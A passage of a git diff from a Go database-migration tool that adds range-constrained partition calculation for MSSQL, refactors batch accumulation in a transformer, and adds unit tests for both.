TestConsume_Passthrough_ThresholdExceeded_Exits(t *testing.T) { + db := newMockDb(mockResult{err: dbError()}) + gl := newLoader(db) + chIn := make(chan models.Batch, 1) + chErr := make(chan custom_errors.JobError, 3) + var wg sync.WaitGroup + var rowsLoaded int64 + var failedCount int32 + + sendBatch(chIn, makeBatch(1), &wg) + + done := runConsume(context.Background(), gl, rc(0), 0, chIn, chErr, &wg, &rowsLoaded, &failedCount) + + select { + case <-done: + case <-time.After(testTimeout): + t.Fatal("Consume did not exit after threshold exceeded") + } + + select { + case <-waitWg(&wg): + case <-time.After(testTimeout): + t.Fatal("wg.Wait() timed out after threshold exit") + } +} + +func TestConsume_Accumulation_FlushOnThreshold(t *testing.T) { + db := newMockDb() + gl := newLoader(db) + chIn := make(chan models.Batch, 3) + chErr := make(chan custom_errors.JobError, 1) + var wg sync.WaitGroup + var rowsLoaded int64 + var failedCount int32 + + sendBatch(chIn, makeBatch(1), &wg) + sendBatch(chIn, makeBatch(1), &wg) + sendBatch(chIn, makeBatch(1), &wg) + close(chIn) + + <-runConsume(context.Background(), gl, rc(0), 3, chIn, chErr, &wg, &rowsLoaded, &failedCount) + wg.Wait() + + if rowsLoaded != 3 { + t.Errorf("expected rowsLoaded=3, got %d", rowsLoaded) + } + if db.callCount != 1 { + t.Errorf("expected 1 SaveMassive call, got %d", db.callCount) + } +} + +func TestConsume_Accumulation_FlushOnClose(t *testing.T) { + db := newMockDb() + gl := newLoader(db) + chIn := make(chan models.Batch, 2) + chErr := make(chan custom_errors.JobError, 1) + var wg sync.WaitGroup + var rowsLoaded int64 + var failedCount int32 + + sendBatch(chIn, makeBatch(2), &wg) + sendBatch(chIn, makeBatch(3), &wg) + close(chIn) + + <-runConsume(context.Background(), gl, rc(0), 10, chIn, chErr, &wg, &rowsLoaded, &failedCount) + wg.Wait() + + if rowsLoaded != 5 { + t.Errorf("expected rowsLoaded=5, got %d", rowsLoaded) + } + if db.callCount != 1 { + t.Errorf("expected exactly 1 SaveMassive call (single flush on close), got %d", db.callCount) + } +} + +func TestConsume_Accumulation_RowsLoadedCorrect(t *testing.T) { + db := newMockDb() + gl := newLoader(db) + chIn := make(chan models.Batch, 5) + chErr := make(chan custom_errors.JobError, 1) + var wg sync.WaitGroup + var rowsLoaded int64 + var failedCount int32 + + for range 5 { + sendBatch(chIn, makeBatch(2), &wg) + } + close(chIn) + + <-runConsume(context.Background(), gl, rc(0), 4, chIn, chErr, &wg, &rowsLoaded, &failedCount) + wg.Wait() + + if rowsLoaded != 10 { + t.Errorf("expected rowsLoaded=10, got %d", rowsLoaded) + } + if db.callCount != 3 { + t.Errorf("expected 3 SaveMassive calls (2 threshold flushes + 1 on close), got %d", db.callCount) + } +} + +func TestConsume_Accumulation_WgBalanced_OnContextCancel(t *testing.T) { + db := newMockDb() + gl := newLoader(db) + chIn := make(chan models.Batch) + chErr := make(chan custom_errors.JobError, 1) + var wg sync.WaitGroup + var rowsLoaded int64 + var failedCount int32 + + ctx, cancel := context.WithCancel(context.Background()) + done := runConsume(ctx, gl, rc(0), 10, chIn, chErr, &wg, &rowsLoaded, &failedCount) + + sendBatch(chIn, makeBatch(1), &wg) + sendBatch(chIn, makeBatch(1), &wg) + cancel() + + select { + case <-done: + case <-time.After(testTimeout): + t.Fatal("Consume did not exit after context cancellation") + } + + select { + case <-waitWg(&wg): + case <-time.After(testTimeout): + t.Fatal("wg.Wait() timed out: drainPending did not release accumulated batches on cancel") + } +} + +func TestConsume_Accumulation_ErrorInFlush_WgStillBalanced(t *testing.T) { + db := newMockDb(mockResult{err: dbError()}) + gl := newLoader(db) + chIn := make(chan models.Batch, 2) + chErr := make(chan custom_errors.JobError, 3) + var wg sync.WaitGroup + var rowsLoaded int64 + var failedCount int32 + + sendBatch(chIn, makeBatch(1), &wg) + sendBatch(chIn, makeBatch(1), &wg) + close(chIn) + + <-runConsume(context.Background(), gl, rc(10), 2, chIn, chErr, &wg, &rowsLoaded, &failedCount) + + select { + case <-waitWg(&wg): + case <-time.After(testTimeout): + t.Fatal("wg.Wait() timed out: wg.Done() not called after flush error") + } +} + +func TestConsume_Accumulation_MultipleFlushes_NonFatalErrors(t *testing.T) { + db := newMockDb(mockResult{err: dbError()}, mockResult{err: dbError()}) + gl := newLoader(db) + chIn := make(chan models.Batch, 4) + chErr := make(chan custom_errors.JobError, 6) + var wg sync.WaitGroup + var rowsLoaded int64 + var failedCount int32 + + for range 4 { + sendBatch(chIn, makeBatch(1), &wg) + } + close(chIn) + + <-runConsume(context.Background(), gl, rc(10), 2, chIn, chErr, &wg, &rowsLoaded, &failedCount) + + select { + case <-waitWg(&wg): + case <-time.After(testTimeout): + t.Fatal("wg.Wait() timed out") + } + + if atomic.LoadInt32(&failedCount) != 2 { + t.Errorf("expected failedCount=2, got %d", failedCount) + } + if rowsLoaded != 0 { + t.Errorf("expected rowsLoaded=0 (all batches failed), got %d", rowsLoaded) + } +} + +func TestConsume_EmptyInput_NoProcessing(t *testing.T) { + db := newMockDb() + gl := newLoader(db) + chIn := make(chan models.Batch) + chErr := make(chan custom_errors.JobError, 1) + var wg sync.WaitGroup + var rowsLoaded int64 + var failedCount int32 + + close(chIn) + + done := runConsume(context.Background(), gl, rc(0), 5, chIn, chErr, &wg, &rowsLoaded, &failedCount) + + select { + case <-done: + case <-time.After(testTimeout): + t.Fatal("Consume did not exit after empty input channel was closed") + } + + if db.callCount != 0 { + t.Errorf("expected no SaveMassive calls, got %d", db.callCount) + } + if rowsLoaded != 0 { + t.Errorf("expected rowsLoaded=0, got %d", rowsLoaded) + } + wg.Wait() +} + +func TestConsume_ContextCancellation_Exits(t *testing.T) { + db := newMockDb() + gl := newLoader(db) + chIn := make(chan models.Batch) + chErr := make(chan custom_errors.JobError, 1) + var wg sync.WaitGroup + var rowsLoaded int64 + var failedCount int32 + + ctx, cancel := context.WithCancel(context.Background()) + done := runConsume(ctx, gl, rc(0), 0, chIn, chErr, &wg, &rowsLoaded, &failedCount) + + cancel() + + select { + case <-done: + case <-time.After(testTimeout): + t.Fatal("Consume did not exit after context cancellation") + } + wg.Wait() +} diff --git a/internal/app/etl/table_analyzers/main.go b/internal/app/etl/table_analyzers/main.go index 2949c46..e1d22cb 100644 --- a/internal/app/etl/table_analyzers/main.go +++ b/internal/app/etl/table_analyzers/main.go @@ -2,6 +2,7 @@ package table_analyzers import ( "context" + "math" "git.ksdemosapps.com/kylesoda/go-migrate/internal/app/config" "git.ksdemosapps.com/kylesoda/go-migrate/internal/app/etl" @@ -15,23 +16,10 @@ func PartitionRangeGenerator( tableAnalyzer etl.TableAnalyzer, tableInfo config.TableInfo, partitionColumn string, + partitionCalculationStrategy string, rowsPerPartition int64, jobRange config.RangeConfig, ) ([]models.Partition, error) { - if jobRange.Min > 0 { - return []models.Partition{{ - Id: uuid.New(), - HasRange: true, - RetryCounter: 0, - Range: models.PartitionRange{ - Min: jobRange.Min, - Max: jobRange.Max, - IsMinInclusive: jobRange.IsMinInclusive, - IsMaxInclusive: jobRange.IsMaxInclusive, - }, - }}, nil - } - rowsCount, err := tableAnalyzer.EstimateTotalRows(ctx, tableInfo) logrus.Infof("Estimated rows in source: %v (%s.%s)", rowsCount, tableInfo.Schema, tableInfo.Table) if err != nil { @@ -39,21 +27,107 @@ func PartitionRangeGenerator( } if rowsCount <= rowsPerPartition { - return []models.Partition{{ - Id: uuid.New(), - HasRange: false, - RetryCounter: 0, - }}, nil - + hasRange := jobRange.Min != nil || jobRange.Max != nil + partition := models.Partition{Id: uuid.New(), HasRange: hasRange, RetryCounter: 0} + if hasRange { + var min, max int64 + if jobRange.Min != nil { + min = *jobRange.Min + } + if jobRange.Max != nil { + max = *jobRange.Max + } + partition.Range = models.PartitionRange{ + Min: min, + Max: max, + IsMinInclusive: jobRange.IsMinInclusive, + IsMaxInclusive: jobRange.IsMaxInclusive, + } + } + return []models.Partition{partition}, nil } partitionsCount := rowsCount / rowsPerPartition - partitions, err := tableAnalyzer.CalculatePartitionRanges(ctx, tableInfo, partitionColumn, partitionsCount) + + if partitionCalculationStrategy == "ESTIMATION" { + return calculatePartitionsEstimation(ctx, tableAnalyzer, tableInfo, partitionColumn, partitionsCount, jobRange) + } + + partitions, err := tableAnalyzer.CalculatePartitionRanges(ctx, tableInfo, partitionColumn, partitionsCount, jobRange) if err != nil { return nil, err } - // logrus.Debugf("Partitions: %+v (%s.%s)", partitions, tableInfo.Schema, tableInfo.Table) + logrus.Debugf("Partitions count: %v (%s.%s)", len(partitions), tableInfo.Schema, tableInfo.Table) + + return partitions, nil +} + +func calculatePartitionsEstimation( + ctx context.Context, + tableAnalyzer etl.TableAnalyzer, + tableInfo config.TableInfo, + partitionColumn string, + partitionsCount int64, + rangeConstraint config.RangeConfig, +) ([]models.Partition, error) { + var minValue, maxValue int64 + + if rangeConstraint.Min != nil && rangeConstraint.Max != nil { + minValue = *rangeConstraint.Min + maxValue = *rangeConstraint.Max + logrus.Infof("Column range for %s.%s.%s: [%d, %d] (user-defined)", tableInfo.Schema, tableInfo.Table, partitionColumn, minValue, maxValue) + } else if rangeConstraint.Min != nil || rangeConstraint.Max != nil { + result, err := tableAnalyzer.QueryMaxMinFromColumn(ctx, tableInfo, partitionColumn) + if err != nil { + return nil, err + } + if rangeConstraint.Min != nil { + minValue = *rangeConstraint.Min + maxValue = result.Max + logrus.Infof("Column range for %s.%s.%s: [%d, %d] (min user-defined)", tableInfo.Schema, tableInfo.Table, partitionColumn, minValue, maxValue) + } else { + minValue = result.Min + maxValue = *rangeConstraint.Max + logrus.Infof("Column range for %s.%s.%s: [%d, %d] (max user-defined)", tableInfo.Schema, tableInfo.Table, partitionColumn, minValue, maxValue) + } + } else { + result, err := tableAnalyzer.QueryMaxMinFromColumn(ctx, tableInfo, partitionColumn) + if err != nil { + return nil, err + } + logrus.Infof("Column range for %s.%s.%s: [%d, %d]", tableInfo.Schema, tableInfo.Table, partitionColumn, result.Min, result.Max) + minValue = result.Min + maxValue = result.Max + } + rangeSize := maxValue - minValue + stepSize := int64(math.Ceil(float64(rangeSize) / float64(partitionsCount))) + + partitions := make([]models.Partition, 0, partitionsCount) + + for i := range partitionsCount { + partitionMin := minValue + (i * stepSize) + partitionMax := minValue + ((i + 1) * stepSize) + + if i == partitionsCount-1 { + partitionMax = maxValue + } + + isMinInclusive := i == 0 + partition := models.Partition{ + Id: uuid.New(), + HasRange: true, + RetryCounter: 0, + Range: models.PartitionRange{ + Min: partitionMin, + Max: partitionMax, + IsMinInclusive: isMinInclusive, + IsMaxInclusive: true, + }, + } + + partitions = append(partitions, partition) + } return partitions, nil } diff --git a/internal/app/etl/table_analyzers/main_test.go b/internal/app/etl/table_analyzers/main_test.go new file mode 100644 index 0000000..e21a902 --- /dev/null +++ b/internal/app/etl/table_analyzers/main_test.go @@ -0,0 +1,332 @@ +package table_analyzers + +import ( + "context" + "testing" + + "git.ksdemosapps.com/kylesoda/go-migrate/internal/app/config" + "git.ksdemosapps.com/kylesoda/go-migrate/internal/app/etl" + "git.ksdemosapps.com/kylesoda/go-migrate/internal/app/models" +) + +type MockTableAnalyzer struct { + minValue int64 + maxValue int64 + totalRows int64 + capturedRangeConstraint config.RangeConfig +} + +func (m *MockTableAnalyzer) QueryColumnTypes(_ context.Context, _ config.TableInfo) ([]models.ColumnType, error) { + return nil, nil +} + +func (m *MockTableAnalyzer) EstimateTotalRows(_ context.Context, _ config.TableInfo) (int64, error) { + return m.totalRows, nil +} + +func (m *MockTableAnalyzer) QueryMaxMinFromColumn(_ context.Context, _ config.TableInfo, _ string) (etl.MaxMinColumnResult, error) { + return etl.MaxMinColumnResult{Min: m.minValue, Max: m.maxValue}, nil +} + +func (m *MockTableAnalyzer) CalculatePartitionRanges(_ context.Context, _ config.TableInfo, _ string, _ int64, rangeConstraint config.RangeConfig) ([]models.Partition, error) { + m.capturedRangeConstraint = rangeConstraint + return []models.Partition{}, nil +} + +//go:fix inline +func ptr64(v int64) *int64 { return new(v) } + +var testTableInfo = config.TableInfo{Schema: "dbo", Table: "test"} + +func TestCalculatePartitionsEstimation_NoOverlap(t *testing.T) { + ctx := context.Background() + mock := &MockTableAnalyzer{minValue: 0, maxValue: 100} + + partitions, err := calculatePartitionsEstimation(ctx, mock, testTableInfo, "id", 4, config.RangeConfig{}) + if err != nil { + t.Fatalf("unexpected error: %v", err) + } + + if len(partitions) != 4 { + t.Errorf("expected 4 partitions, got %d", len(partitions)) + } + + for i := 0; i < len(partitions)-1; i++ { + current := partitions[i].Range + next := partitions[i+1].Range + if current.Max == next.Min && current.IsMaxInclusive && next.IsMinInclusive { + t.Errorf("partition %d and %d overlap at value %d (both inclusive)", i, i+1, current.Max) + } + } +} + +func TestCalculatePartitionsEstimation_CoverageComplete(t *testing.T) { + ctx := context.Background() + mock := &MockTableAnalyzer{minValue: 1000, maxValue: 2000} + + partitions, err := calculatePartitionsEstimation(ctx, mock, testTableInfo, "id", 5, config.RangeConfig{}) + if err != nil { + t.Fatalf("unexpected error: %v", err) + } + + if partitions[0].Range.Min != 1000 || !partitions[0].Range.IsMinInclusive { + t.Errorf("first partition should start at 1000 (inclusive), got %d (inclusive=%v)", + partitions[0].Range.Min, partitions[0].Range.IsMinInclusive) + } + + if partitions[len(partitions)-1].Range.Max != 2000 { + t.Errorf("last partition should end at 2000, got %d", partitions[len(partitions)-1].Range.Max) + } +} + +func TestCalculatePartitionsEstimation_FirstPartitionInclusive(t *testing.T) { + ctx := context.Background() + mock := &MockTableAnalyzer{minValue: 50, maxValue: 70} + + partitions, err := calculatePartitionsEstimation(ctx, mock, testTableInfo, "id", 3, config.RangeConfig{}) + if err != nil { + t.Fatalf("unexpected error: %v", err) + } + + if !partitions[0].Range.IsMinInclusive { + t.Errorf("first partition should have IsMinInclusive=true") + } + + if partitions[0].Range.Min != 50 { + t.Errorf("first partition should start at 50, got %d", partitions[0].Range.Min) + } + + for i := 1; i < len(partitions); i++ { + if partitions[i].Range.IsMinInclusive { + t.Errorf("partition %d should have IsMinInclusive=false to avoid overlap", i) + } + } +} + +func TestPartitionRangeGenerator_Exact_NoRange_PassesEmptyConstraint(t *testing.T) { + ctx := context.Background() + mock := &MockTableAnalyzer{totalRows: 1000} + + _, err := PartitionRangeGenerator(ctx, mock, testTableInfo, "id", "EXACT", 100, config.RangeConfig{}) + if err != nil { + t.Fatalf("unexpected error: %v", err) + } + + if mock.capturedRangeConstraint.Min != nil || mock.capturedRangeConstraint.Max != nil { + t.Errorf("expected empty range constraint, got min=%v max=%v", + mock.capturedRangeConstraint.Min, mock.capturedRangeConstraint.Max) + } +} + +func TestPartitionRangeGenerator_Exact_BothBounds_PassesBothToAnalyzer(t *testing.T) { + ctx := context.Background() + mock := &MockTableAnalyzer{totalRows: 1000} + jobRange := config.RangeConfig{Min: ptr64(200), Max: ptr64(800), IsMinInclusive: true, IsMaxInclusive: true} + + _, err := PartitionRangeGenerator(ctx, mock, testTableInfo, "id", "EXACT", 100, jobRange) + if err != nil { + t.Fatalf("unexpected error: %v", err) + } + + rc := mock.capturedRangeConstraint + if rc.Min == nil || *rc.Min != 200 { + t.Errorf("expected Min=200, got %v", rc.Min) + } + if rc.Max == nil || *rc.Max != 800 { + t.Errorf("expected Max=800, got %v", rc.Max) + } + if !rc.IsMinInclusive || !rc.IsMaxInclusive { + t.Errorf("expected both bounds inclusive, got minInc=%v maxInc=%v", rc.IsMinInclusive, rc.IsMaxInclusive) + } +} + +func TestPartitionRangeGenerator_Exact_MinOnly_PassesMinNilMax(t *testing.T) { + ctx := context.Background() + mock := &MockTableAnalyzer{totalRows: 1000} + jobRange := config.RangeConfig{Min: ptr64(500)} + + _, err := PartitionRangeGenerator(ctx, mock, testTableInfo, "id", "EXACT", 100, jobRange) + if err != nil { + t.Fatalf("unexpected error: %v", err) + } + + rc := mock.capturedRangeConstraint + if rc.Min == nil || *rc.Min != 500 { + t.Errorf("expected Min=500, got %v", rc.Min) + } + if rc.Max != nil { + t.Errorf("expected Max=nil (no upper bound), got %v", rc.Max) + } +} + +func TestPartitionRangeGenerator_Exact_MaxOnly_PassesMaxNilMin(t *testing.T) { + ctx := context.Background() + mock := &MockTableAnalyzer{totalRows: 1000} + jobRange := config.RangeConfig{Max: ptr64(300)} + + _, err := PartitionRangeGenerator(ctx, mock, testTableInfo, "id", "EXACT", 100, jobRange) + if err != nil { + t.Fatalf("unexpected error: %v", err) + } + + rc := mock.capturedRangeConstraint + if rc.Min != nil { + t.Errorf("expected Min=nil (no lower bound), got %v", rc.Min) + } + if rc.Max == nil || *rc.Max != 300 { + t.Errorf("expected Max=300, got %v", rc.Max) + } +} + +func TestPartitionRangeGenerator_Estimation_BothBounds_UsesUserRange(t *testing.T) { + ctx := context.Background() + // DB min/max differ intentionally — user bounds should take precedence. + mock := &MockTableAnalyzer{totalRows: 1000, minValue: 0, maxValue: 999} + jobRange := config.RangeConfig{Min: ptr64(200), Max: ptr64(700), IsMinInclusive: true} + + partitions, err := PartitionRangeGenerator(ctx, mock, testTableInfo, "id", "ESTIMATION", 100, jobRange) + if err != nil { + t.Fatalf("unexpected error: %v", err) + } + + if len(partitions) == 0 { + t.Fatal("expected at least one partition") + } + + if partitions[0].Range.Min != 200 { + t.Errorf("first partition should start at user min=200, got %d", partitions[0].Range.Min) + } + if partitions[len(partitions)-1].Range.Max != 700 { + t.Errorf("last partition should end at user max=700, got %d", partitions[len(partitions)-1].Range.Max) + } +} + +func TestPartitionRangeGenerator_Estimation_MinOnly_QueriesDBForMax(t *testing.T) { + ctx := context.Background() + mock := &MockTableAnalyzer{totalRows: 1000, minValue: 0, maxValue: 999} + jobRange := config.RangeConfig{Min: ptr64(500), IsMinInclusive: true} + + partitions, err := PartitionRangeGenerator(ctx, mock, testTableInfo, "id", "ESTIMATION", 100, jobRange) + if err != nil { + t.Fatalf("unexpected error: %v", err) + } + + if len(partitions) == 0 { + t.Fatal("expected at least one partition") + } + + if partitions[0].Range.Min != 500 { + t.Errorf("first partition should start at user min=500, got %d", partitions[0].Range.Min) + } + if partitions[len(partitions)-1].Range.Max != 999 { + t.Errorf("last partition should end at DB max=999, got %d", partitions[len(partitions)-1].Range.Max) + } +} + +func TestPartitionRangeGenerator_Estimation_MaxOnly_QueriesDBForMin(t *testing.T) { + ctx := context.Background() + mock := &MockTableAnalyzer{totalRows: 1000, minValue: 100, maxValue: 999} + jobRange := config.RangeConfig{Max: ptr64(600), IsMaxInclusive: true} + + partitions, err := PartitionRangeGenerator(ctx, mock, testTableInfo, "id", "ESTIMATION", 100, jobRange) + if err != nil { + t.Fatalf("unexpected error: %v", err) + } + + if len(partitions) == 0 { + t.Fatal("expected at least one partition") + } + + if partitions[0].Range.Min != 100 { + t.Errorf("first partition should start at DB min=100, got %d", partitions[0].Range.Min) + } + if partitions[len(partitions)-1].Range.Max != 600 { + t.Errorf("last partition should end at user max=600, got %d", partitions[len(partitions)-1].Range.Max) + } +} + +func TestPartitionRangeGenerator_SinglePartition_NoRange(t *testing.T) { + ctx := context.Background() + mock := &MockTableAnalyzer{totalRows: 50} + + partitions, err := PartitionRangeGenerator(ctx, mock, testTableInfo, "id", "EXACT", 100, config.RangeConfig{}) + if err != nil { + t.Fatalf("unexpected error: %v", err) + } + + if len(partitions) != 1 { + t.Fatalf("expected 1 partition, got %d", len(partitions)) + } + if partitions[0].HasRange { + t.Error("single partition with no range should have HasRange=false") + } +} + +func TestPartitionRangeGenerator_SinglePartition_BothBounds(t *testing.T) { + ctx := context.Background() + mock := &MockTableAnalyzer{totalRows: 50} + jobRange := config.RangeConfig{Min: ptr64(100), Max: ptr64(200), IsMinInclusive: true, IsMaxInclusive: true} + + partitions, err := PartitionRangeGenerator(ctx, mock, testTableInfo, "id", "EXACT", 100, jobRange) + if err != nil { + t.Fatalf("unexpected error: %v", err) + } + + if len(partitions) != 1 { + t.Fatalf("expected 1 partition, got %d", len(partitions)) + } + p := partitions[0] + if !p.HasRange { + t.Error("expected HasRange=true") + } + if p.Range.Min != 100 || p.Range.Max != 200 { + t.Errorf("expected [100, 200], got [%d, %d]", p.Range.Min, p.Range.Max) + } + if !p.Range.IsMinInclusive || !p.Range.IsMaxInclusive { + t.Errorf("expected both inclusive, got minInc=%v maxInc=%v", p.Range.IsMinInclusive, p.Range.IsMaxInclusive) + } +} + +func TestPartitionRangeGenerator_SinglePartition_MinOnly(t *testing.T) { + ctx := context.Background() + mock := &MockTableAnalyzer{totalRows: 50} + jobRange := config.RangeConfig{Min: ptr64(100), IsMinInclusive: true} + + partitions, err := PartitionRangeGenerator(ctx, mock, testTableInfo, "id", "EXACT", 100, jobRange) + if err != nil { + t.Fatalf("unexpected error: %v", err) + } + + p := partitions[0] + if !p.HasRange { + t.Error("expected HasRange=true") + } + if p.Range.Min != 100 { + t.Errorf("expected Min=100, got %d", p.Range.Min) + } + if p.Range.Max != 0 { + t.Errorf("expected Max=0 (no upper bound), got %d", p.Range.Max) + } +} + +func TestPartitionRangeGenerator_SinglePartition_MaxOnly(t *testing.T) { + ctx := context.Background() + mock := &MockTableAnalyzer{totalRows: 50} + jobRange := config.RangeConfig{Max: ptr64(200), IsMaxInclusive: true} + + partitions, err := PartitionRangeGenerator(ctx, mock, testTableInfo, "id", "EXACT", 100, jobRange) + if err != nil { + t.Fatalf("unexpected error: %v", err) + } + + p := partitions[0] + if !p.HasRange { + t.Error("expected HasRange=true") + } + if p.Range.Min != 0 { + t.Errorf("expected Min=0 (no lower bound), got %d", p.Range.Min) + } + if p.Range.Max != 200 { + t.Errorf("expected Max=200, got %d", p.Range.Max) + } +} diff --git a/internal/app/etl/table_analyzers/mssql.go b/internal/app/etl/table_analyzers/mssql.go index 39f9daf..1c7dd5f 100644 --- a/internal/app/etl/table_analyzers/mssql.go +++ b/internal/app/etl/table_analyzers/mssql.go @@ -196,17 +196,65 @@ GROUP BY t.name` return rowsCount, nil } +func (ta *MssqlTableAnalyzer) QueryMaxMinFromColumn( + ctx context.Context, + tableInfo config.TableInfo, + columnName string, +) (etl.MaxMinColumnResult, error) { + query := fmt.Sprintf(` +SELECT + MIN([%s]) AS min_value, + MAX([%s]) AS max_value +FROM [%s].[%s]`, columnName, columnName, tableInfo.Schema, tableInfo.Table) + + ctxTimeout, cancel := context.WithTimeout(ctx, 1*time.Minute) + defer cancel() + + result := etl.MaxMinColumnResult{} + err := ta.db.QueryRow(ctxTimeout, query).Scan(&result.Min, &result.Max) + if err != nil { + return etl.MaxMinColumnResult{}, err + } + + return result, nil +} + func (ta *MssqlTableAnalyzer) CalculatePartitionRanges( ctx context.Context, tableInfo config.TableInfo, partitionColumn string, maxPartitions int64, + rangeConstraint config.RangeConfig, ) ([]models.Partition, error) { + whereClause := "" + args := []any{sql.Named("maxPartitions", maxPartitions)} + + if rangeConstraint.Min != nil || rangeConstraint.Max != nil { + var conditions []string + if rangeConstraint.Min != nil { + minOp := ">" + if rangeConstraint.IsMinInclusive { + minOp = ">=" + } + conditions = append(conditions, fmt.Sprintf("[%s] %s @rangeMin", partitionColumn, minOp)) + args = append(args, sql.Named("rangeMin", *rangeConstraint.Min)) + } + if rangeConstraint.Max != nil { + maxOp := "<" + if rangeConstraint.IsMaxInclusive { + maxOp = "<=" + } + conditions = append(conditions, fmt.Sprintf("[%s] %s @rangeMax", partitionColumn, maxOp)) + args = append(args, sql.Named("rangeMax", *rangeConstraint.Max)) + } + whereClause = "WHERE " + strings.Join(conditions, " AND ") + } + query := fmt.Sprintf(` SELECT MIN([%s]) AS lower_limit, MAX([%s]) AS upper_limit -FROM (SELECT [%s], NTILE(@maxPartitions) OVER (ORDER BY [%s]) AS batch_id FROM [%s].[%s]) AS T +FROM (SELECT [%s], NTILE(@maxPartitions) OVER (ORDER BY [%s]) AS batch_id FROM [%s].[%s] %s) AS T GROUP BY batch_id ORDER BY batch_id`, partitionColumn, @@ -214,12 +262,13 @@ ORDER BY batch_id`, partitionColumn, partitionColumn, tableInfo.Schema, - tableInfo.Table) + tableInfo.Table, + whereClause) ctxTimeout, cancel := context.WithTimeout(ctx, 1*time.Minute) defer cancel() - rows, err := ta.db.Query(ctxTimeout, query, sql.Named("maxPartitions", maxPartitions)) + rows, err := ta.db.Query(ctxTimeout, query, args...) if err != nil { return nil, err } diff --git a/internal/app/etl/table_analyzers/postgres.go b/internal/app/etl/table_analyzers/postgres.go index 8aac15d..194eae4 100644 --- a/internal/app/etl/table_analyzers/postgres.go +++ b/internal/app/etl/table_analyzers/postgres.go @@ -164,11 +164,20 @@ func (ta *PostgresTableAnalyzer) EstimateTotalRows( return 0, nil } +func (ta *PostgresTableAnalyzer) QueryMaxMinFromColumn( + ctx context.Context, + tableInfo config.TableInfo, + columnName string, +) (etl.MaxMinColumnResult, error) { + return etl.MaxMinColumnResult{}, nil +} + func (ta *PostgresTableAnalyzer) CalculatePartitionRanges( ctx context.Context, tableInfo config.TableInfo, partitionColumn string, maxPartitions int64, + rangeConstraint config.RangeConfig, ) ([]models.Partition, error) { return []models.Partition{}, nil } diff --git a/internal/app/etl/transformers/consume.go b/internal/app/etl/transformers/consume.go index bd3a92d..ae65555 100644 --- a/internal/app/etl/transformers/consume.go +++ b/internal/app/etl/transformers/consume.go @@ -11,6 +11,58 @@ import ( "github.com/google/uuid" ) +type batchAccumulator struct { + batchSize int + rows []models.UnknownRowValues + parents []models.BatchRef +} + +func (a *batchAccumulator) add(batch models.Batch) { + a.rows = append(a.rows, batch.Rows...) + a.parents = append(a.parents, models.BatchRef{Id: batch.Id}) +} + +func (a *batchAccumulator) ready() bool { + return len(a.rows) >= a.batchSize +} + +func (a *batchAccumulator) flush(ctx context.Context, chOut chan<- models.Batch, wg *sync.WaitGroup) bool { + if len(a.rows) == 0 { + return true + } + out := models.Batch{ + Id: uuid.New(), + ParentBatches: a.parents, + Rows: a.rows, + } + wg.Add(1) + select { + case chOut <- out: + case <-ctx.Done(): + wg.Done() + return false + } + a.rows = nil + a.parents = nil + return true +} + +func sendTransformError(ctx context.Context, err error, ch chan<- custom_errors.JobError) { + if errors.Is(err, context.Canceled) || errors.Is(err, context.DeadlineExceeded) { + return + } + var jobErr custom_errors.JobError + if je, ok := errors.AsType[*custom_errors.JobError](err); ok { + jobErr = *je + } else { + jobErr = custom_errors.JobError{ShouldCancelJob: true, Msg: "Transformation failed", Prev: err} + } + select { + case ch <- jobErr: + case <-ctx.Done(): + } +} + func (mssqlTr *MssqlTransformer) Consume( ctx context.Context, columns []models.ColumnType, @@ -25,90 +77,40 @@ func (mssqlTr *MssqlTransformer) Consume( storagePlan := computeStorageTransformationPlan(ctx, mssqlTr.azureClient, mssqlTr.toStorage, columns, mssqlTr.sourceTable) transformationPlan = append(transformationPlan, storagePlan...) - var accRows []models.UnknownRowValues - var parentBatchesId []uuid.UUID - var firstPartitionId uuid.UUID - - flush := func() bool { - if len(accRows) == 0 { - return true - } - out := models.Batch{ - Id: uuid.New(), - PartitionId: firstPartitionId, - ParentBatchesId: parentBatchesId, - Rows: accRows, - } - select { - case chBatchesOut <- out: - wgActiveBatches.Add(1) - case <-ctx.Done(): - return false - } - accRows = nil - parentBatchesId = nil - firstPartitionId = uuid.Nil - return true - } + acc := &batchAccumulator{batchSize: batchSize} for { - if ctx.Err() != nil { - return - } - select { case <-ctx.Done(): return case batch, ok := <-chBatchesIn: if !ok { - flush() + acc.flush(ctx, chBatchesOut, wgActiveBatches) return } if len(transformationPlan) > 0 { - err := ProcessBatchWithRetries(ctx, &batch, transformationPlan, retryConfig) - if err != nil { - if errors.Is(err, ctx.Err()) { - return - } - - if jobError, ok := errors.AsType[*custom_errors.JobError](err); ok { - select { - case chJobErrorsOut <- *jobError: - case <-ctx.Done(): - return - } - } else { - select { - case chJobErrorsOut <- custom_errors.JobError{ShouldCancelJob: true, Msg: "Transformation failed", Prev: err}: - case <-ctx.Done(): - return - } - } - + if err := ProcessBatchWithRetries(ctx, &batch, transformationPlan, retryConfig); err != nil { + sendTransformError(ctx, err, chJobErrorsOut) return } } if batchSize <= 0 { + wgActiveBatches.Add(1) select { case chBatchesOut <- batch: - wgActiveBatches.Add(1) case <-ctx.Done(): + wgActiveBatches.Done() return } continue } - if len(parentBatchesId) == 0 { - firstPartitionId = batch.PartitionId - } - accRows = append(accRows, batch.Rows...) - parentBatchesId = append(parentBatchesId, batch.Id) - - if len(accRows) >= batchSize { - if !flush() { + acc.add(batch) + if acc.ready() { + if !acc.flush(ctx, chBatchesOut, wgActiveBatches) { return } } diff --git a/internal/app/etl/transformers/consume_test.go b/internal/app/etl/transformers/consume_test.go new file mode 100644 index 0000000..15b565d --- /dev/null +++ b/internal/app/etl/transformers/consume_test.go @@ -0,0 +1,545 @@ +package transformers + +import ( + "context" + "errors" + "sync" + "testing" + "time" + + "git.ksdemosapps.com/kylesoda/go-migrate/internal/app/config" + "git.ksdemosapps.com/kylesoda/go-migrate/internal/app/custom_errors" + "git.ksdemosapps.com/kylesoda/go-migrate/internal/app/models" + "github.com/google/uuid" +) + +const testTimeout = 2 * time.Second + +func makeBatch(numRows int) models.Batch { + rows := make([]models.UnknownRowValues, numRows) + for i := range rows { + rows[i] = models.UnknownRowValues{i} + } + return models.Batch{Id: uuid.New(), Rows: rows} +} + +func noRetry() config.RetryConfig { + return config.RetryConfig{Attempts: 1} +} + +func newTransformer() *MssqlTransformer { + return &MssqlTransformer{} +} + +func uuidColumn() models.ColumnType { + return models.NewColumnType("col_uuid", false, false, "uniqueidentifier", "uniqueidentifier", "string", false, 0, 0, 0) +} + +func runConsume( + ctx context.Context, + tr *MssqlTransformer, + columns []models.ColumnType, + batchSize int, + chIn <-chan models.Batch, + chOut chan<- models.Batch, + chErr chan<- custom_errors.JobError, + wg *sync.WaitGroup, +) <-chan struct{} { + done := 